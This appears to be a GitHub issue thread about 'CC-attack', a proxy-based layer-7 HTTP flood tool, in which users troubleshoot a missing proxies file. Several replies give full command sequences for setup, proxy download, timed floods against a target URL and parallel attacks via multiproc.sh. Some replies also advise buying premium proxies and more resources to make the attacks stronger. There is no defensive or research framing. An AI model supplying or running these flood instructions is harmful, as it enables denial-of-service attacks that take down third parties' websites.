CC-attack
CC-attack copied to clipboard
Proxies file not found
Hi Old version working fine when I was updated new version getting below error how to fix please help me Proxies file not found
https://ibb.co/7X6bGK9
what is your command
Use this command first to get proxies: python3 cc.py -url https://google.com -v 5 -down -check Then use multiproc.sh for attack.
Hi python start.py bomb https://mywebsite.com 0 50 proxy.txt 100 3600
I tried like this no use
python3 cc.py -url http://website.com -v 5 -s 60 python3 cc.py -url http://website.com -v 4 -s 60
I tried getting same error Proxies file not found
Did you download proxies
Please read it https://github.com/Leeon123/CC-attack#usage
Mode: [cc/post/head]
Checking list Number Of Proxies: 343 Building threads... Flooding...
after then quitting
Defualt attack time is 60 seconds
If you want to set it longer, use -s <time>
hello @Leeon123 teacher I am trying your tools but I don't know what the command to run is can you explain in detail about adding proxy and starting the attack
@gizliag Is the usage not enough clear? What do you not understand? Please tell me
@gizliag Is the usage not enough clear? What do you not understand? Please tell me
Sir, I couldn't understand proxy transfer, then I did not understand how we can run these tools, so if you prepare a syntax, it will be easier. @Leeon123
Enter the following commands in the linux terminal
- pip3 install requests pysocks
- git clone https://github.com/Leeon123/CC-attack.git
- cd CC-attack
- python3 cc.py -url https://google.com/ -v 5 -down -check -s 1 After receiving the proxies list with above command, you can use this command python3 cc.py -url https://google.com/ -v 5 -s 60 for sending attack. If you want to send multiple attacks at the same time, do the following. open multiproc.sh change http://target.com to your target website and change -v 4 to -v 5 atk_cmd="python3 cc.py -url http://target.com -v 5 -s 60" You can use pkill python3 command to stop running attacks.
@ThomasCFelix
Sir, first of all, thank you, I was able to do the attack, but I have only one question in mind
https://camo.githubusercontent.com/edd974e1c4cd72a0db0639f1f5af56cc7cf3584b688575419d9e5692dc937c46/68747470733a2f2f692e696d6775722e636f6d2f4b4c4a495a73382e706e67
There are 200 thousand attacks on this link, but there are 100 attacks on mine, how can I do this? Do I need to use vds/vps?
For layer 7 attacks, 4 factors are involved in the power of attacks. 1. Porxy List 2. Network Speed 3. CPU 4. RAM If you want to send strong attacks, you should purchase premium proxies
python3 cc.py -url http://website.com -v 5 -s 60 python3 cc.py -url http://website.com -v 4 -s 60
I tried getting same error Proxies file not found try this python3 cc.py -url https://target.com -v 5 -down -check -t 800 -s 61
For layer 7 attacks, 4 factors are involved in the power of attacks. 1. Porxy List 2. Network Speed 3. CPU 4. RAM If you want to send strong attacks, you should purchase premium proxies
give me link premium proxy
For layer 7 attacks, 4 factors are involved in the power of attacks. 1. Porxy List 2. Network Speed 3. CPU 4. RAM If you want to send strong attacks, you should purchase premium proxies
give me link premium proxy
Do you have a telegram id?
@parkos123
On Wed, 20 Apr 2022 at 04:19, ThomasCFelix @.***> wrote:
For layer 7 attacks, 4 factors are involved in the power of attacks. 1. Porxy List 2. Network Speed 3. CPU 4. RAM If you want to send strong attacks, you should purchase premium proxies
give me link premium proxy
Do you have a telegram id?
— Reply to this email directly, view it on GitHub https://github.com/Leeon123/CC-attack/issues/80#issuecomment-1103094466, or unsubscribe https://github.com/notifications/unsubscribe-auth/AUHQDC7DBT5PXBZRJKWVXGLVF4ILVANCNFSM5SH6Z2QA . You are receiving this because you commented.Message ID: @.***>
Use this command first to get proxies: python3 cc.py -url https://google.com -v 5 -down -check Then use multiproc.sh for attack.
You dont even need a target and v 5 ist default
Hi python start.py bomb https://mywebsite.com 0 50 proxy.txt 100 3600
I tried like this no use
This wont work
Mode: [cc/post/head]
Checking list Number Of Proxies: 343 Building threads... Flooding...
after then quitting
Default time is 60s you can chamgw it with -s (seconds) or edit default in cc.py